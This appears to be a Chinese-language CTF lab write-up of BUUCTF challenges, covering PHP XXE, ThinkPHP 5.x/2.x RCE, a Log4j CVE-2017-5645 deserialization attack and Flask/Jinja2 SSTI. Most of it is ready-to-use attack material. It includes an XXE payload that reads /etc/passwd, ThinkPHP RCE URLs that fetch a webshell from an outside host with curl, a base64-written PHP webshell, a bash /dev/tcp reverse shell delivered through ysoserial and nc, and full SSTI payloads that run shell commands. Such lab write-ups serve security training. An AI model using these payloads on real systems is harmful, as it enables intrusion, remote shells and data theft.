BUUCTF-Real
BUUCTF-Real
- [PHP]XXE
- [ThinkPHP]5-Rce
- [ThinkPHP]5.0.23-Rce
- [ThinkPHP]2-Rce
- Log4j
- [log4j]CVE-2017-5645
- [Flask]SSTI
- 未完待续
[PHP]XXE
PHP 7.0.30 libxml 2.8.0
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。
Web目录为./www,其中包含4个文件:
$ tree .
├── dom.php # 示例:使用DOMDocument解析body
├── index.php
├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body
└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body
dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞
利用代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
/*
1.读取任意文件
file 协议,file:///etc//passwd
php 协议,php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http://192.168.0.128:80
参见:https://xz.aliyun.com/t/3357#toc-11
*/
利用如下
一篇文章带你深入理解漏洞之 XXE 漏洞
所以要想更进一步的利用我们不能将眼光局限于 file 协议,我们必须清楚地知道在何种平台,我们能用何种协议
如图所示:
PHP在安装扩展以后还能支持的协议:
如图所示:
注意:
1.其中从2012年9月开始,Oracle JDK版本中删除了对gopher方案的支持,后来又支持的版本是 Oracle JDK 1.7
update 7 和 Oracle JDK 1.6 update 35
2.libxml 是 PHP 的 xml 支持
[ThinkPHP]5-Rce
大佬博客走起
以下是其博客POC
************Thinkphp = 5.1.x , php版本>5.5
http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert
http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=
************Thinkphp = 5.0.x , php版本>=5.4
http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
但是buuctf靶机不能通过上面5.0.x的POC,猜测是其assert函数被禁止或者其他问题
本次buuctf的poc 其版本为5.0.20
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
有命令执行我就喜欢远控,发现该靶机有curl命令且可以通外网,那就下载一个蚁剑,
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20-o%20Lndex.php%20http://x.x.x.x:80/Lndex.php
通过ls命令发现下载成功。
连接,
[ThinkPHP]5.0.23-Rce
使用Burp拦截的时候,先右键【变更请求方法】,由GET变为POST,再发送给repeater。
poc
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -l
1.Lndex.php 利用curl下载。
2.利用base64写数据,避免特殊符号传输影响。
使用base64编码写入;assert可以换成eval
明文:aaa<?php @assert($_POST['xss']);?>bbb
密文:YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg==
POC:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell9.php
[ThinkPHP]2-Rce
直接访问
http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
即可执行phpinfo():
Log4j
参考博客Log4j2任意命令执行buuoj靶场复现 - Nie’s Blog
博客的反弹shell是用的自己脚本 。
JNDIExploit-1.2-SNAPSHOT.jar 也可以用它自带的命令。null是运行jar工具的VPS地址
[log4j]CVE-2017-5645
利用工具ysoserial·
将工具上传到公网VPS。
首先知道Linux的反弹命令
bash -i >& /dev/tcp/127.0.0.1/6666 0>&1 这是最原始的可执行命令
由于有特殊字符所以base64加密,在执行
bash -c {echo,xxx}|{base64,-d}|bashxxx是base64密文,这是执行xxx的可执行命令。
所以先将127.0.0.1和6666换成你VPS的IP和nc -lvp 端口的监听端口
然后base64加密。
假设VPS IP192.168.1.10
vps先执行 nc -lvp 6666
最后vps执行:java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAvNjY2NiAwPiYx}|{base64,-d}|bash" | nc node4.buuoj.cn 25874
node4.buuoj.cn 25874是靶机的地址
最后成功收到shell连接
[Flask]SSTI
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
注意url里面的编码,因为python语法的要求是严格缩进,所以里面有%0a的缩进url编码。
访问
http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
列出目录:
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22ls%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
结果:
app.py
查看app.py:
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22cat%20app.py%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
查看python版本:
popen(%22python3%20-V%22)
是否存在curl
popen(%22pcurl%20-V%22)
所以,如果要直接建立交互式shell的话,
第一种方式:需要将server.py上传到VPS运行,利用curl将client.py下载到靶机并运行。
Python3实现反向Shell
第二种方式:tplmap
Tplmap是一个python工具,可以通过使用沙箱转义技术找到代码注入和服务器端模板注入(SSTI)漏洞。
Tplmap的安装与用法
半天没找到flag,百度了才发现在系统环境变量里
popen(%22env%22).read()’
下面推荐一些关于SSTI博客,博客中还有相关链接,可以顺藤摸瓜:
flask之ssti模版注入从零到入门
flask ssti python2和python3 注入总结和区别
Python沙箱逃逸总结
Flask/Jinja2 SSTI && Python 沙箱逃逸基础